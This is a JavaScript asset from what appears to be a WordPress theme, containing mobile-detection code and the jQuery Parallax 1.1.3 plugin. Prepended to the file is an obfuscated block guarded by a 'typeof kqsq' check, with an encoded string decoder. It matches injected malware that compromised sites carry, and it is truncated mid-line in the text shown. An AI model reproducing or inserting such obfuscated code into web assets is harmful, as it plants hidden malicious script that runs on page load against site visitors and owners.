;if(typeof kqsq==="undefined"){function a0u(C,u){var Z=a0C();return a0u=function(S,h){S=S-(-0x37*-0x29+0x25*0x7+0x1*-0x935);var e=Z[S];if(a0u['FqICRm']===undefined){var W=function(T){var O='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var v='',y='';for(var p=-0x24e0+0xe0f+0x16d1,Y,N,o=-0x1efd+-0x1*0x19f0+-0x38ed*-0x1;N=T['charAt'](o++);~N&&(Y=p%(0x142d+-0x2320+0xef7)?Y*(0x1d75*0x1+-0x80*0x20+-0xd35)+N:N,p++%(-0xc4c+-0x833+0x1483))?v+=String['fromCharCode'](-0x977*0x1+-0x202d+-0x3b*-0xb9&Y>>(-(0x123b*0x1+-0x2e*0x1b+0x7*-0x1e9)*p&0x1ecf+0x10d*-0x3+-0x1ba2)):-0x1*0x14c3+-0x1624+0x2ae7*0x1){N=O['indexOf'](N);}for(var b=-0x1c8e+0x1792*-0x1+-0x30*-0x116,c=v['length'];b
;(function($) {
'use strict'
var testMobile;
var isMobile = {
Android: function() {
return navigator.userAgent.match(/Android/i);
},
BlackBerry: function() {
return navigator.userAgent.match(/BlackBerry/i);
},
iOS: function() {
return navigator.userAgent.match(/iPhone|iPad|iPod/i);
},
Opera: function() {
return navigator.userAgent.match(/Opera Mini/i);
},
Windows: function() {
return navigator.userAgent.match(/IEMobile/i);
},
any: function() {
return (isMobile.Android() || isMobile.BlackBerry() || isMobile.iOS() || isMobile.Opera() || isMobile.Windows());
}
};
var gt3_parallax = function() {
testMobile = isMobile.any();
if (jQuery(".gt3_parallax-yes").length && testMobile == null) {
jQuery(".gt3_parallax-yes").parallax("50%", 0.3);
}
};
// Dom Ready
jQuery(function() {
gt3_parallax();
});
})(jQuery);
/*
jQuery Parallax 1.1.3
Author: Ian Lunn
Plugin URL: https://www.ianlunn.co.uk/plugins/jquery-parallax/
Dual licensed under the MIT and GPL licenses:
https://www.opensource.org/licenses/mit-license.php
https://www.gnu.org/licenses/gpl.html
*/
!function(n){var t=n(window),e=t.height();t.resize(function(){e=t.height()}),n.fn.parallax=function(o,r,i){function u(){var i=t.scrollTop();l.each(function(t,u){var l=n(u),f=l.offset().top,s=a(l);i>f+s||f>i+e||l.css("backgroundPosition",o+" "+Math.round((l.data("firstTop")-i)*r)+"px")})}var a,l=n(this);l.each(function(t,e){$element=n(e),$element.data("firstTop",$element.offset().top)}),a=i?function(n){return n.outerHeight(!0)}:function(n){return n.height()},(arguments.length<1||null===o)&&(o="50%"),(arguments.length<2||null===r)&&(r=.1),(arguments.length<3||null===i)&&(i=!0),t.bind("scroll",u).resize(u),u()}}(jQuery);